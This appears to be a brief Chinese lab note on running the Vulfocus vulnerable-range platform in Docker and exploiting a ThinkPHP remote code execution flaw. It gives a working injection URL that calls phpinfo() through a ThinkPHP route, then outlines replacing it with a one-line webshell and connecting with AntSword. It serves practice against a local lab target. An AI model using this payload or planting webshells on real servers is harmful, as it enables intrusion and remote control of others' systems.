一、环境
vulfocus网上自行下载
启动命令:
docker run -d --privileged -p 8081:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=192.168.131.144 8e55f85571c8
一定添加--privileged不然只能拉取环境首页不显示
二、thinkphp远程代码执行
首页:
先开始资产收集:
端口:
目录:
网上搜索历史cve
输入pyload
http://192.168.131.144:29319/index.php?s=/index/index/name/${@phpinfo()})
命令执行
使用bp抓包
替换成一句话木马
使用蚁剑去连接